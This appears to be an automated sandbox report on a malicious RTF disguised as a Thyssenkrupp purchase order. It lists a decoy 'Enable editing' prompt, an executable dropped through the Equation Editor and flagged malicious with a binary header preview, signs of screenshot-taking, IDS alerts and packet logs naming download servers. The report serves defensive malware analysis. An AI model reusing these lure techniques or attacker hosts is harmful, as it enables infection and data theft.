Preview:	2.2.3.9.2.2.4.4.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E2DECFB2-ADA4-4B5F-990B-FC73115868E7}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\dgm5xaa0.ljc.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\m0e2fsxs.vl2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Thyssenkrupp PO040232.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:09 2023, mtime=Fri Aug 11 15:42:09 2023, atime=Thu Sep 26 06:19:16 2024, length=591385, window=hide
Category:	dropped
Size (bytes):	1069
Entropy (8bit):	4.576571943195122
Encrypted:	false
SSDEEP:	24:8Jt12/XT82TS54s6VuSheAmuSDv3qK57u:8JW/XT824X6IShPphK9u
MD5:	9893C0A7A44E35F7D327283101A2BDE6
SHA1:	5960F28DB36D14E30A82EA06383BAAAFC6FDA5AD
SHA-256:	D739A352366232824CBBA173FB6F2BBA8EF4F38FAD204BE4405A340045474F60
SHA-512:	6222EB665DD9FAA390D90802C2E47155F473B46FE8B86BADDB33E33B300F271D8FE9F4C41D0915042BEA624A33261707C4BC305879ABDA1C1F6164080BDBF6A7
Malicious:	false
Preview:	L..................F.... ......r......r....#.e.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....:Yf:..user.8......QK.X:Yf:...&=....U...............A.l.b.u.s.....z.1......WG...Desktop.d......QK.X.WG...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....\|.2.....:Yi: .THYSSE~1.DOC..`.......WE..WE..........................T.h.y.s.s.e.n.k.r.u.p.p. .P.O.0.4.0.2.3.2...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\358075\Users.user\Desktop\Thyssenkrupp PO040232.doc.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.T.h.y.s.s.e.n.k.r.u.p.p. .P.O.0.4.0.2.3.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......358075.........

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [folders]
Category:	dropped
Size (bytes):	76
Entropy (8bit):	4.8185960597187085
Encrypted:	false
SSDEEP:	3:M1LnHLXVF1qIpzCm4jcWHLXVF1qIpzCv:MlHjj2HjjI
MD5:	DBE6381E9AAF143E2396CFF13E7FC75E
SHA1:	8D9578511265D91FBC4C4F294EB0D614F6DF06E7
SHA-256:	41A22F94221EC0BEE30F74466B0C37BEBD381CEE6CBAD4AD7C3451CDF52B919F
SHA-512:	AF761CD78070F88F832D4D90CE3C8CC5FF003D30F2EFB51D0163151AA48141130571EB5CF39FAC7447A985F75A91AA139DCD334DBF2429764B6D9F29A4854159
Malicious:	false
Preview:	[doc]..Thyssenkrupp PO040232.LNK=0..[folders]..Thyssenkrupp PO040232.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
MD5:	89AFCB26CA4D4A770472A95DF4A52BA8
SHA1:	C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
SHA-256:	EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
SHA-512:	EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	708096
Entropy (8bit):	7.874129511837346
Encrypted:	false
SSDEEP:	12288:9Ok++Z4CujQ9TPfriopH5dvXVqml8rukCDWyFqAN6ukRLEdtTJx:9Ok++feQ9TPfrzpHPQ7r8yyQAwJg
MD5:	3E2EA8C3F5CA13F16F8CA1C85087F6B6
SHA1:	BC8727F0E142E331B34F01D2DC483DA61B24DB6B
SHA-256:	3E0693E5ED5EF3326BD7F6E54DB8ADC71E28540C2C3E2A60CBF8D1BDB0FF41F3
SHA-512:	343F33714FB819A3765A3B440E331057500EA17BD535FE02079222843C34F58A03FA17510EA091FC26DB63CBA8F4904724733AFC8EEA89672473BDCDBB354A10
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0......$........... ........@.. .......................@............@.................................L...O........ ................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc.... ......."..................@..@.reloc....... ......................@..B........................H........Y..\5..........,... 7...........................................0..\|........(..........(....}......{....(....}........(....}........(....}........(....}........(....}........(....}........(....}.....0..!..........(.... l...Y m...Z..(....X.+......0..m........s....}..... ....}.....#......cA}..... .ig.}.....#......c.}..... .'....s....}........s....}......}......}.....(.......(.......8..........>...%..,.o....s.......{.....{....(....}......{.....{....( ...}......{.....{

C:\Users\user\Desktop\~$yssenkrupp PO040232.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
MD5:	89AFCB26CA4D4A770472A95DF4A52BA8
SHA1:	C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
SHA-256:	EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
SHA-512:	EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\Documents\VIPRecovery\Screenshot.png

Download File

Process:	C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	137749
Entropy (8bit):	7.910012866686291
Encrypted:	false
SSDEEP:	3072:14mjfyHDoI7hM+bcFCRch/CaEP4dyXASDx/vsEjENF8gy:/OjFM+gMo/XZdyXASDdk/49
MD5:	F05488F9898F5095AE2446C59CB9CA1C
SHA1:	577CA8A7C17014C157E383060F6139CD4D01A87D
SHA-256:	1EABCEA4E7E21487ABFD428AE395AE7B2C4E8FA7461BE4D10C8AB3EC130045D5
SHA-512:	9607CDBA7B7814FFA314BCDAC7EF6339CA7C6FD365F14BA15BE40A82CE463557E076CCFD52A8C8DFD1BDE8A49745A469462A2115EB2D8EB00DBCE43CDF886511
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.......=.9.y..\|....^.zmc.m9ckw..7`.a...xHF.1&.$`.....c....$.FB.r.F9K#i$.5(...D...S..]]].n.....}.K..RW..z......O............... ...........5..@...........j....q?.7v...w..+./...G......b,..j4.s..........}....S.?G...................o..\..nxj).....>..}..E...gB......{...v...G...c.Rs.`h'55y<.I...A...4.;...o.I[6o....i..]...~z.....D............. .i...?6...?Cg.#:x.h.!......Z..h.Dk.N...>..B..a5h. ...n._[.QS..#NG...].F...J\q..i.&Z.../XL..-.%...%.h...t..).1.`..5.j.*Z.t....e.....,u..............5..\...>}.y\5 ........K.o.A.[.......Dk......."Z..h...i.N.}...s.?......c........G......G....um.o=.e4.gL.A.....+.....f....i..1....S...\|....`........;.o.....3...u.3...%..........(.6...s.cx...H....C.#.'m.4....Y._...........s..>.....>:..n..I...^:.>..i..~w..y.}.....i.../$.Zk...@~..%m.u.8J}.Z.qP'..5;.29s..M.<..-^F.:6...s..7.e.4.f.IS&M..G.HS'M...W:.)..G.R..vi.M.8..g..5.Z_j..ym.

Static File Info

General

File type:	Nim source code, Non-ISO extended-ASCII text, with very long lines (47032), with CRLF, CR, LF line terminators
Entropy (8bit):	2.6927963408086315
TrID:	Rich Text Format (4004/1) 100.00%
File name:	Thyssenkrupp PO040232.doc
File size:	591'385 bytes
MD5:	d441cab32cafefaed9326b791cfc3b15
SHA1:	44aa1ba0ae5fb845899750881708003365937cea
SHA256:	b9a387acc992d7431adfbbf28a1b18baa07c1dc64592c193d78c6a517747692d
SHA512:	226dac350c27e776833aea90bb16c40d460a558a0361e76e86b2d64406f800222c523634e8082f38ba102ce80e0a75d84ba11655039ce33cedd1ddb95a4ab538
SSDEEP:	6144:PwAYwAYwAYwAYwAGWwzVzoSDrLwc8AdhsKQNSj9zURWWG:G9
TLSH:	9CC4452ED34B05598F62437B9B5B0E5542BCBA3EF38151B0346C537833EAC3A922667D
File Content Preview:	{\rt..{\*\yo7wdnPS8Ofqn6flVuiQL4Rzjwy5aJNdujEyVKW93fpWJ0gYfkCwu81sCAMgPsWdYiQzdIWOaK1Maq9Cabu1zrt8oGQXm42oyeyAY7DplJWVA0sJGM8p9dqQZ6RlDJgnCTBeoDM7cVc7buealx8XtsdOWdhYGzGGE3JbwxlvBqaMOxEe6GDGl04hhjS3QVXr8JeARnBuUCiO5YPBJCeDIOv08K1PHHJEvAUWs6PiYUHMC7xpRghU1

File Icon


Icon Hash:	2764a3aaaeb7bdbf

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T09:19:22.080013+0200	2022050	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1	1	66.63.187.123	80	192.168.2.22	49161	TCP
2024-09-26T09:19:22.216241+0200	2022051	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2	1	66.63.187.123	80	192.168.2.22	49161	TCP
2024-09-26T09:19:27.712093+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.22	49162	193.122.130.0	80	TCP
2024-09-26T09:19:29.038087+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.22	49162	193.122.130.0	80	TCP
2024-09-26T09:19:29.445238+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.22	49164	188.114.97.3	443	TCP
2024-09-26T09:19:30.394686+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.22	49165	132.226.247.73	80	TCP
2024-09-26T09:19:30.835613+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.22	49166	188.114.96.3	443	TCP
2024-09-26T09:19:33.963816+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.22	49170	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 09:19:21.357820988 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:21.362895012 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:21.362970114 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:21.363132954 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:21.370096922 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.079797029 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.079852104 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.079896927 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.079940081 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.079977036 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.079988956 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.080013037 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.080025911 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.080025911 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.080059052 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.080123901 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.080176115 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.080177069 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.080213070 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.080219984 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.080250025 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.080255032 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.080291986 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.084897041 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.084959984 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.084984064 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.085000038 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.085014105 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.085047960 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.085277081 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.085334063 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.086163998 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.207556009 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.207602024 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.207652092 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.207660913 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.207653046 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.207696915 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.207717896 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.207729101 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.207748890 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.207768917 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.207787037 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.207834005 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.207838058 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.207850933 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.207890034 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.207890034 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.208182096 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.208235979 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.208255053 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.208272934 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.208292007 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.208304882 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.208332062 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.208332062 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.208831072 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.208888054 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.208888054 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.208905935 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.208947897 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.208947897 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.208951950 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.208969116 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.209009886 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.209009886 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.209736109 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.209764957 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.209781885 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.209789991 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.209804058 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.209825993 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.209917068 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.209933996 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.209965944 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.209976912 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.210642099 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.210689068 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.210697889 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.210738897 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.216240883 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.216293097 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.216329098 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.216345072 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.216373920 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.216384888 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.336102962 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.336179972 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.336218119 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.336225986 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.336225986 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.336251974 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.336260080 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.336289883 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.336289883 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.336323977 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.336366892 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.336415052 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.336447954 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.336484909 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.336500883 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.336500883 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.336500883 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.336500883 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.336500883 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.336529016 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.336580038 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.336615086 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.336632013 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.336648941 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.336658955 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.336685896 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.336694002 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.336731911 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.337596893 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.337650061 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.337657928 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.337688923 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.337697029 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.337723970 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.337726116 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.337759018 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.337769032 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.337795973 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.337804079 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.337833881 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.337837934 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.337876081 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.338598967 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.338651896 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.338651896 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.338689089 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.338694096 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.338723898 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.338737965 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.338761091 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.338774920 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.338795900 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.338812113 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.338840961 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.338846922 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.338898897 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.339988947 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.340039968 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.340049982 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.340078115 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.340082884 CEST	49161	80	192.168.2.22	66.63.187.123
